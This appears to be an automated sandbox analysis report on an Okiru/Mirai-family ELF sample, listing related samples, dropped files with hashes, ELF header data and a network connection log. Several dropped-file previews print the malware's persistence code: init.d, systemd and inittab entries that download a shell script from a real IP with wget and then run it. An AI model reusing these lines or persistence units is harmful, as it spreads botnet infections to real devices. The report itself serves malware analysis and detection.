                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CANONICAL-ASGBbot.ppc.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                        • 91.189.91.42
                                                                        boatnet.arc.elfGet hashmaliciousMiraiBrowse
                                                                        • 185.125.190.26
                                                                        sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 91.189.91.42
                                                                        arm.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 91.189.91.42
                                                                        x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 185.125.190.26
                                                                        mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 91.189.91.42
                                                                        nklarm6.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        splarm6.elfGet hashmaliciousUnknownBrowse
                                                                        • 185.125.190.26
                                                                        nabarm6.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        zerppc.elfGet hashmaliciousUnknownBrowse
                                                                        • 185.125.190.26
                                                                        CANONICAL-ASGBbot.ppc.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                        • 91.189.91.42
                                                                        boatnet.arc.elfGet hashmaliciousMiraiBrowse
                                                                        • 185.125.190.26
                                                                        sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 91.189.91.42
                                                                        arm.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 91.189.91.42
                                                                        x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 185.125.190.26
                                                                        mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 91.189.91.42
                                                                        nklarm6.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        splarm6.elfGet hashmaliciousUnknownBrowse
                                                                        • 185.125.190.26
                                                                        nabarm6.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        zerppc.elfGet hashmaliciousUnknownBrowse
                                                                        • 185.125.190.26
                                                                        AMAZON-02USmipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 54.171.230.55
                                                                        armv5l.elfGet hashmaliciousUnknownBrowse
                                                                        • 35.163.11.216
                                                                        splm68k.elfGet hashmaliciousUnknownBrowse
                                                                        • 3.138.165.134
                                                                        nklarm7.elfGet hashmaliciousUnknownBrowse
                                                                        • 3.115.112.216
                                                                        splarm7.elfGet hashmaliciousUnknownBrowse
                                                                        • 3.116.167.193
                                                                        nklarm5.elfGet hashmaliciousUnknownBrowse
                                                                        • 18.183.83.81
                                                                        jklspc.elfGet hashmaliciousUnknownBrowse
                                                                        • 3.110.151.242
                                                                        nabspc.elfGet hashmaliciousUnknownBrowse
                                                                        • 54.228.23.120
                                                                        splarm.elfGet hashmaliciousUnknownBrowse
                                                                        • 13.251.226.54
                                                                        jklm68k.elfGet hashmaliciousUnknownBrowse
                                                                        • 54.118.240.226
                                                                        INIT7CHbot.ppc.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                        • 109.202.202.202
                                                                        sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 109.202.202.202
                                                                        arm.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 109.202.202.202
                                                                        mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 109.202.202.202
                                                                        nklarm6.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        nabarm6.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        zerm68k.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        zerarm6.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        armv4eb.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 109.202.202.202
                                                                        NETIXBGmips.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 94.156.227.234
                                                                        x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 94.156.227.234
                                                                        sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 94.156.227.234
                                                                        arm.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 94.156.227.234
                                                                        x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 94.156.227.234
                                                                        mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 94.156.227.234
                                                                        arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        • 94.156.227.234
                                                                        powerpc.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 94.156.227.234
                                                                        x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                                                        • 94.156.227.234
                                                                        arm7.nn-20241224-0051.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        • 94.156.227.234
                                                                        No context
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        /etc/init.d/systemsh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                          sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                            sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                              sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                                sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      /etc/init.d/sh4.nn.elfsh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                                        sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                                          sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                                            sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                                              sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                  sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                    Process:/tmp/sh4.nn.elf
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):119
                                                                                                    Entropy (8bit):4.657720481046131
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:KPJRXKhiFDDoCvLdjX48FIbILbaaFOdFXa5O:WJRKkfoYZX48bbaaeXCO
                                                                                                    MD5:352020393577339317EBEE4AED36F8BF
                                                                                                    SHA1:CED68ED5C7986138611DD30CC41136CE80F3E397
                                                                                                    SHA-256:B5859A5BF22F0AB879821E4C2C3F95B6A9FC8B229CDE4BEEA07C465C77913A17
                                                                                                    SHA-512:7B247718835A753C6C02D331CBB5DE5FE62D7BFBA213A769F3197A962060089FAD6FB2AD0B07E6C605BF04C2B536FCDD3DA333521691D1103DDF51C9508CF131
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:run bootcmd_mmc0; /tmp/sh4.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                                                    Process:/bin/sh
                                                                                                    File Type:POSIX shell script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):395
                                                                                                    Entropy (8bit):4.526047213035463
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:QRk/XNxaN2PUJgjvMUFRuKN+dRRucSOyd3:+McIJoYOM3
                                                                                                    MD5:F48DD17432FBE95CA55B2C0006BC9046
                                                                                                    SHA1:5DF733C513CD723F1FA28F3FDE4A27DE2A97E369
                                                                                                    SHA-256:E67B8F595AA3FC551DA51B8971C7294872E6598D9AF61B9F42BF8AF3090D47C0
                                                                                                    SHA-512:81D29DA5DFCF71D13527174BE03BE8C898BC181E2B6A4F67A2D40DFA017C28C7B542370EEB58D87B0A3BC44FB9FE69923020DEA3D6BBB3D94E5FA15758FA204B
                                                                                                    Malicious:true
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: sh4.nn.elf, Detection: malicious, Browse
                                                                                                    • Filename: sh4.nn.elf, Detection: malicious, Browse
                                                                                                    • Filename: sh4.nn.elf, Detection: malicious, Browse
                                                                                                    • Filename: sh4.nn.elf, Detection: malicious, Browse
                                                                                                    • Filename: sh4.nn.elf, Detection: malicious, Browse
                                                                                                    • Filename: sh4.nn.elf, Detection: malicious, Browse
                                                                                                    • Filename: sh4.nn.elf, Detection: malicious, Browse
                                                                                                    Reputation:low
                                                                                                    Preview:#!/bin/sh.# /etc/init.d/sh4.nn.elf..case "" in. start). echo 'Starting sh4.nn.elf'. /tmp/sh4.nn.elf &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping sh4.nn.elf'. killall sh4.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start|stop|restart}". exit 1. ;;.esac.exit 0.
                                                                                                    Process:/tmp/sh4.nn.elf
                                                                                                    File Type:POSIX shell script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):106
                                                                                                    Entropy (8bit):4.627354501209226
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:TKH4vZKKhiFDvSDRFiLdjX48FIbILpaKB0dFLoKE0:h8KkzSXoZX48bzBeLXE0
                                                                                                    MD5:4E8B86A572F983DC08ABDF82E6E12267
                                                                                                    SHA1:67E681B9BF8F26DB26BD4E53575759CB0BD8BCED
                                                                                                    SHA-256:B2D48476DA5C2307C68F833F5E1DDBD62DA6071705C0E28A0B538562F22D34A9
                                                                                                    SHA-512:BC4B612279B03060507571882368A5917FA67045202B2AFAA1782002F3DF324ED8F381D73A833C6FEBBC90B1B279F301B03F755845CE15F83C44D0DB33F9E88C
                                                                                                    Malicious:true
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: sh4.nn.elf, Detection: malicious, Browse
                                                                                                    • Filename: sh4.nn.elf, Detection: malicious, Browse
                                                                                                    • Filename: sh4.nn.elf, Detection: malicious, Browse
                                                                                                    • Filename: sh4.nn.elf, Detection: malicious, Browse
                                                                                                    • Filename: sh4.nn.elf, Detection: malicious, Browse
                                                                                                    • Filename: sh4.nn.elf, Detection: malicious, Browse
                                                                                                    • Filename: sh4.nn.elf, Detection: malicious, Browse
                                                                                                    Reputation:low
                                                                                                    Preview:#!/bin/sh./tmp/sh4.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.
                                                                                                    Process:/tmp/sh4.nn.elf
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):111
                                                                                                    Entropy (8bit):4.583391244844054
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:nAWu5IhiFDDoCvLdjX48FIbILbaaFOdFXa5O:AykfoYZX48bbaaeXCO
                                                                                                    MD5:E1166D45D9ED40EB21A7C591F90E419A
                                                                                                    SHA1:DB52F95035ABA87D7CCC4B29E018F28B04EC8067
                                                                                                    SHA-256:BCEB01F80A4F323C56443FC1D08377DB9CE32925668A525A5439B122C9BE4231
                                                                                                    SHA-512:8808997CB246238C3675779D03313C5024E281279E68A8D13651DE64DBDA4EA12802FE1DC0182535FEB9D24EA0BA776E25800D468AF962041606C67043ED5824
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:::respawn:/tmp/sh4.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                                                    Process:/tmp/sh4.nn.elf
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):53
                                                                                                    Entropy (8bit):3.871459242626451
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                                                                                                    MD5:2BD9B4BE30579E633FC0191AA93DF486
                                                                                                    SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                                                                                                    SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                                                                                                    SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:gorilla botnet is on the device ur not a cat go away.
                                                                                                    Process:/tmp/sh4.nn.elf
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):102
                                                                                                    Entropy (8bit):4.472384332378184
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:TgKhiFDvSDRFiLdjX48FIbILbaaFOdFXa50:TgKkzSXoZX48bbaaeXC0
                                                                                                    MD5:47195CB470ACF6E4B1DBE72664993713
                                                                                                    SHA1:4C26B6C09CC2E0D88BDCDF721A224BBAD50688E6
                                                                                                    SHA-256:6EC6B33455644B4BEA142834F4BD6724BE0342BB00C9CAF297FB7DB7C02CE22B
                                                                                                    SHA-512:CF55F81BCABB132E69D2819EAE38F53970DF225E75C19C93CAB795C3ECDCDB0F79204A04850DA166EBB1E3B96CEAD019DBA8AAFF894C33142EC21F7BC0C139C5
                                                                                                    Malicious:true
                                                                                                    Preview:/tmp/sh4.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.
                                                                                                    Process:/tmp/sh4.nn.elf
                                                                                                    File Type:POSIX shell script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10
                                                                                                    Entropy (8bit):3.121928094887362
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:TKH4vn:hv
                                                                                                    MD5:3E2B31C72181B87149FF995E7202C0E3
                                                                                                    SHA1:BD971BEC88149956458A10FC9C5ECB3EB99DD452
                                                                                                    SHA-256:A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
                                                                                                    SHA-512:543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                    Preview:#!/bin/sh.
                                                                                                    Process:/tmp/sh4.nn.elf
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):300
                                                                                                    Entropy (8bit):5.0656991431492315
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:z8ifitRZAMzdK+mO02+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+Vp+GWRdtd+GWRXY+GWRuL6
                                                                                                    MD5:59A513CC72AFDE3E897F4C5CDD4DAE49
                                                                                                    SHA1:5CF03D24C8D60A234A71C2DC66DA5273576D1CE3
                                                                                                    SHA-256:AA0631BA912510F7837087EF3C7F2E97D3976D6D2FAC18993C2C30659AFC95F2
                                                                                                    SHA-512:7EB7FFA69570D78ECBCBF11AC81B9667380CA98D72DB40A3F04D0AB17AB24915114A7B6A6A603BCA4D297E515FB64E167FB40445C76E0791085BDEF7FF176258
                                                                                                    Malicious:false
                                                                                                    Preview:[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/sh4.nn.elf.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.
                                                                                                    Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):76
                                                                                                    Entropy (8bit):3.7627880354948586
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                                                    MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                                                    SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                                                    SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                                                    SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                                                    Malicious:false
                                                                                                    Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                                                    Process:/tmp/sh4.nn.elf
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16
                                                                                                    Entropy (8bit):3.625
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:TgKhiln:TgKEn
                                                                                                    MD5:AA13A1788DEE62AD7B81E381463BF8D7
                                                                                                    SHA1:0E21290B03BAD90EC3B1D5638F84929E822F6AAE
                                                                                                    SHA-256:53D5AB596D45FDDA9C031F87D2CC18EEBF3710689256F65DA7577E20EB59AEEA
                                                                                                    SHA-512:3E78B3236C5696912F507060451E200251009DB6DF3D5CE0CDD4F1108FB600A3FB768C811ED6700D48890651DE1B6A7507AC311F2BAC717C3E9B333BA94E0140
                                                                                                    Malicious:false
                                                                                                    Preview:/tmp/sh4.nn.elf.
                                                                                                    File type:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
                                                                                                    Entropy (8bit):6.949871616445475
                                                                                                    TrID:
                                                                                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                    File name:sh4.nn.elf
                                                                                                    File size:80'764 bytes
                                                                                                    MD5:a77b2146e2cee3edd81794c6dc36cc4f
                                                                                                    SHA1:9a7e1e6b0a404bad276c263c904774e7d3b12a66
                                                                                                    SHA256:98f07d8da535ace7c61c1de942960e763490483c02a811d38b6f59496e05b498
                                                                                                    SHA512:4d75204cb309f01d1a126aad566f5bcf8af0bbf9f32a3b8ef691f48971086c13a630e10d60034ae652169c794762ce2e1f141b5c89185e4448121a78014717c9
                                                                                                    SSDEEP:1536:3jKQimPceMfwNJmx1MFCKUFh17+G68bCgCdzPFo:TxaglU9968bMjFo
                                                                                                    TLSH:FC83AE36C835AD14D09445F8B9B18FB46B93B840954F2FF659AAC7798003EACF21A7F4
                                                                                                    File Content Preview:.ELF..............*.......@.4....9......4. ...(...............@...@..4...4...............4...4B..4B......&..........Q.td............................././"O.n........#.*@........#.*@.....o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

                                                                                                    ELF header

                                                                                                    Class:ELF32
                                                                                                    Data:2's complement, little endian
                                                                                                    Version:1 (current)
                                                                                                    Machine:<unknown>
                                                                                                    Version Number:0x1
                                                                                                    Type:EXEC (Executable file)
                                                                                                    OS/ABI:UNIX - System V
                                                                                                    ABI Version:0
                                                                                                    Entry Point Address:0x4001a0
                                                                                                    Flags:0x9
                                                                                                    ELF Header Size:52
                                                                                                    Program Header Offset:52
                                                                                                    Program Header Size:32
                                                                                                    Number of Program Headers:3
                                                                                                    Section Header Offset:80324
                                                                                                    Section Header Size:40
                                                                                                    Number of Section Headers:11
                                                                                                    Header String Table Index:10
                                                                                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                    NULL0x00x00x00x00x0000
                                                                                                    .initPROGBITS0x4000940x940x300x00x6AX004
                                                                                                    .textPROGBITS0x4000e00xe00x10ee00x00x6AX0032
                                                                                                    .finiPROGBITS0x410fc00x10fc00x240x00x6AX004
                                                                                                    .rodataPROGBITS0x410fe40x10fe40x24bc0x00x2A004
                                                                                                    .ctorsPROGBITS0x4234a40x134a40x80x00x3WA004
                                                                                                    .dtorsPROGBITS0x4234ac0x134ac0x80x00x3WA004
                                                                                                    .dataPROGBITS0x4234b80x134b80x4b80x00x3WA004
                                                                                                    .gotPROGBITS0x4239700x139700x100x40x3WA004
                                                                                                    .bssNOBITS0x4239800x139800x22140x00x3WA004
                                                                                                    .shstrtabSTRTAB0x00x139800x430x00x0001
                                                                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                    LOAD0x00x4000000x4000000x134a00x134a06.98070x5R E0x10000.init .text .fini .rodata
                                                                                                    LOAD0x134a40x4234a40x4234a40x4dc0x26f04.63220x6RW 0x10000.ctors .dtors .data .got .bss
                                                                                                    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Dec 24, 2024 06:27:47.684283018 CET4433360654.171.230.55192.168.2.23
                                                                                                    Dec 24, 2024 06:27:47.684540987 CET33606443192.168.2.2354.171.230.55
                                                                                                    Dec 24, 2024 06:27:47.804261923 CET4433360654.171.230.55192.168.2.23
                                                                                                    Dec 24, 2024 06:27:49.691596985 CET43928443192.168.2.2391.189.91.42
                                                                                                    Dec 24, 2024 06:27:50.131892920 CET6002438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:50.254532099 CET382426002494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:50.254632950 CET6002438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:50.254992962 CET6002438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:50.377330065 CET382426002494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:50.897135973 CET6002438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:51.057166100 CET382426002494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:51.375127077 CET382426002494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:51.375199080 CET6002438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:51.901380062 CET6002638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:52.021193027 CET382426002694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:52.021308899 CET6002638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:52.021310091 CET6002638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:52.141268969 CET382426002694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:52.539195061 CET6002638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:52.705390930 CET382426002694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:53.146752119 CET382426002694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:53.146868944 CET6002638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:53.683511019 CET6002838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:53.803334951 CET382426002894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:53.803672075 CET6002838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:53.803672075 CET6002838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:53.923356056 CET382426002894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:54.317775965 CET6002838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:54.485183954 CET382426002894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:54.925055027 CET382426002894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:54.925174952 CET6002838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:55.318938971 CET6003038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:55.322774887 CET42836443192.168.2.2391.189.91.43
                                                                                                    Dec 24, 2024 06:27:55.438786030 CET382426003094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:55.438895941 CET6003038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:55.438895941 CET6003038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:55.558502913 CET382426003094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:55.943253994 CET6003038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:56.109302998 CET382426003094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:56.346666098 CET4251680192.168.2.23109.202.202.202
                                                                                                    Dec 24, 2024 06:27:56.568165064 CET382426003094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:56.568233013 CET6003038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:56.944391966 CET6003238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:57.064280033 CET382426003294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:57.064397097 CET6003238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:57.064428091 CET6003238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:57.184037924 CET382426003294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:57.568494081 CET6003238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:57.729373932 CET382426003294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:58.187582970 CET382426003294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:58.187653065 CET6003238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:58.569484949 CET6003438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:58.692768097 CET382426003494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:58.692848921 CET6003438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:58.692903042 CET6003438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:58.813283920 CET382426003494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:59.196835041 CET6003438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:27:59.361413002 CET382426003494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:59.814290047 CET382426003494.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:27:59.814405918 CET6003438242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:00.198070049 CET6003638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:00.318327904 CET382426003694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:00.318402052 CET6003638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:00.318504095 CET6003638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:00.438041925 CET382426003694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:00.823007107 CET6003638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:00.985126019 CET382426003694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:01.431222916 CET382426003694.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:01.431313992 CET6003638242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:01.824218988 CET6003838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:01.944032907 CET382426003894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:01.944145918 CET6003838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:01.944289923 CET6003838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:02.063951969 CET382426003894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:02.448551893 CET6003838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:02.613317966 CET382426003894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:03.059804916 CET382426003894.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:03.060025930 CET6003838242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:03.449812889 CET6004038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:03.569519997 CET382426004094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:03.569595098 CET6004038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:03.569679976 CET6004038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:03.689970016 CET382426004094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:04.073970079 CET6004038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:04.237102985 CET382426004094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:04.691260099 CET382426004094.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:04.691329956 CET6004038242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:05.075117111 CET6004238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:05.194850922 CET382426004294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:05.194935083 CET6004238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:05.194947958 CET6004238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:05.314671993 CET382426004294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:05.699615002 CET6004238242192.168.2.2394.156.227.234
                                                                                                    Dec 24, 2024 06:28:05.865111113 CET382426004294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:06.318630934 CET382426004294.156.227.234192.168.2.23
                                                                                                    Dec 24, 2024 06:28:06.318713903 CET6004238242192.168.2.2394.156.227.234
